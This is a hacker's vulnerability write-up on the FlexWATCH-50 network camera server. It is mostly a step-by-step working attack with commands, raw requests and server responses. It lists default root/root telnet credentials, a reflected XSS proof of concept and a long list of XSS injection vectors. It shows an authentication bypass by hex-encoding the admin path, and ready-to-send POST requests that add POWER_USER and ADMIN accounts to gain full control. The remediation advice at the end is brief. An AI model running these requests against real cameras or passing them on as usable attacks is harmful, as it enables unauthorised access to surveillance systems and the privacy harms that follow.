#============================================================= # Unauthorized Access vulnerability in FlexWATCH camera Server # Second Assault ! #============================================================= Author: SLAIZER mail: slaizer[at]phreaker.net Vendor : SEYEON Technology System : FlexWATCH Network Video Server url : http://www.flexwatch.com/ Mail: sytech@seyeon.co.kr Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003 #==================== # Introduction #==================== A few months ago I published another document , explaining how to obtain entire access to the system of easy and fast form. The same document was sent to SEYEON before being published , since I did not obtain response of them , I decided to publish it. Two months after having being published , SEYEON got in touch with me. They asked me that test a new system already patched to the bug , in order that I was saying to them that bugs had found . They demanded me that it should remove the name of the company of my previus document and thet he should not publish any more... In addition to realizing a work to the company with many economic benefits of completely free form , thing that I do not accept . I will always be ready to help to whom I needed it from free form where as I'm not demanded anything and much less I use propietary software. I'm sorry that it seems to be exagerate but nobody lives of the air. #=================== # Description #=================== 愁o examining the new system! slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80 HTTP/1.0 302 Redirect Server: FlexWATCH-Webs <---------- :) the same everlasting banner Date: Mon Dec 1 01:01:26 2003 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://victim/index.htm Age: 1 弒n another version do not examine the services use , becouse I did not need it :P. root@Necora:~$ nmap -sS -P0 victim Interesting ports on victim (censured :P): PORT STATE SERVICE 21/tcp open ftp <------- 23/tcp open telnet <------- Default user/pass are root/root :P 80/tcp open http <------- They are not also very interesting right now , 1024/tcp open kdm <------- but with the nice thing that is to use ssl :P. 1755/tcp open wms <------- 弒t's time to see web application : 惹ailing along the web we think that the system has changed a bit as for the tree of directories , but for the rest it seems to be equal . The first thing what we meet is a bug in the application entrusted to notify to us that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P . Cross-Site Scripting . Example : mozilla http://victim/hehe.html<H1><script>alert('Security?');</script> Results : Access Error: Page not found when trying to obtain /hehe.html cannot open URL /hehe.html ( The code is executed perfectly even two times are executed .. hehe . Turning out be of that time two windows alerting us with the message -Security ? ). View source : <html> <head> <title>Document Error: Page not found</title> </head> <body> <h2>Access Error: Page not found</h2> when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b> <br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p> </body> </html> Note: This type of methods is well-known to gain access to the system by means of links malicious to do with the identification of some user . document.write / document.cookie / document.location.. I expose different methods of injection Javascript extracted of Globbes Security Advisory #33: <a href="javascript#[code]"> <div onmouseover="[code]"> <img src="javascript:[code]"> <img dynsrc="javascript:[code]"> [IE] <input type="image" dynsrc="javascript:[code]"> [IE] <bgsound src="javascript:[code]"> [IE] &<script>[code]</script> &{[code]}; [N4] <img src=&{[code]};> [N4] <link rel="stylesheet" href="javascript:[code]"> <iframe src="vbscript:[code]"> [IE] <img src="mocha:[code]"> [N4] <img src="livescript:[code]"> [N4] <a href="about:<script>[code]</script>"> <meta http-equiv="refresh" content="0;url=javascript:[code]"> <body onload="[code]"> <div style="background-image: url(javascript:[code]);"> <div style="behaviour: url([link to code]);"> [IE] <div style="binding: url([link to code]);"> [Mozilla] <div style="width: expression([code]);"> [IE] <style type="text/javascript">[code]</style> [N4] <object classid="clsid:..." codebase="javascript:[code]"> [IE] <style><!--</style><script>[code]//--></script> <![CDATA[<!--]]><script>[code]//--></script> <!-- -- --><script>[code]</script><!-- -- --> <script>[code]</script> <img src="blah"onmouseover="[code]"> <img src="blah>" onmouseover="[code]"> <xml src="javascript:[code]"> <xml id="X"><a><b><script>[code]</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera] 愁here has always to be verified the information that the client sends to the Servant , in this case the most obvius serious solution to verify that malicious characters are not inserted as for example substituing to their html equivalent. ------------ u0xa --------------- 嫂t the moment where I want to come it's to this url : admin/aindex.htm . That is where one finds the system-administration , so trying and using imagination I verify that it happens on having sent the request in hexadecimal format. Example : slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm ------------ Url encode to hex mode ---------------- http://victim/%61%64m%69n/a%69nde%78.%68t%6D -----------------By SLAIZER tools ------------------ I obtain this in text plain : ------ code ----- <html> <head> <script language="Javascript"> onBlur=self.focus() </script> <frameset cols="196,*" framespacing="0" frameborder="0"> <frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0"> <frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0"> </frameset> </head> </html> ----- code ----- :D It's my friend the frame of configuracion and it's in plain text .. We go for good way we are going to look if we can do something with this. slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm ------------ Url encode to hex mode ---------------- http://victim/adm%69%6E/%61%64%6D%69n.%68tm -----------------By SLAIZER tools ------------------ Here it is where we go away to centre , so we are going to see it!. Important links : _______________________ |-Change Root | <---- /asp/pwdcfg.asp |Password configuration | | | |-Add User | <---- /asp/adduser.asp /* Let's go! */ | | |-Delete User | <---- /asp/deluser.asp | | |-Access Level | <---- /asp/chglimit.asp |_______________________| slaizer@Necora:~$ nc victim 80 POST /goform/AddUser HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/ Accept-Language: es Content-Type: application/x-www-form-urlencoded Connection: Close User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0) Host: victim Content-Length: 152 Pragma: no-cache RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123 &passconf=root123&group=POWER_USER&enabled=on&ok=OK ----------- u0xa ------------ <br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b> ----------- u0xa ------------ It seems that there is post correctly , but on having tried login shows us this error directly : Access Error: Forbidden When trying to obtain /admin/aindex.htm Access Denied Prohibited User . ------------------------------- foh....but ... I login in : http://victim/app/idxas.html <----- Camera Administration. Login : slaizer password: root123 |o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123 that we add in the previous setp. We have already given a great steo improve.. But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier having this user really more sufficient , but it is enought to us to done one more test but add another user to the group of ADMIN : Example slaizer@Necora:~$ nc victim 80 POST /goform/AddUser HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/ Accept-Language: es Content-Type: application/x-www-form-urlencoded Connection: Close User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0) Host: victim Content-Length: 147 Pragma: no-cache RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root &passconf=123root&group=ADMIN&enabled=on&ok=OK ----------- u0xa ------------ <br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b> ----------- u0xa ------------ At the moment ok! . I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!! You can already do what you want in the system!!! The problem was becouse the directory /admin was already not allowin him access to the users as previously it was happening. #========================= # Solution : #========================= Always verify the type of request that the client realizes, since you can see I have used a miscellany of code hexadeciaml and ascii . The best solution is to create meetings of identification and to allow the access to such directories for the meeting. /* Note : login in www.flexwatch.com as technic e-mail suport... xD */ #======================== # GreetSssSss!!! #======================== - gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu - - kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD [[Irc-Hispano : #boinasnegras , #ngsec]]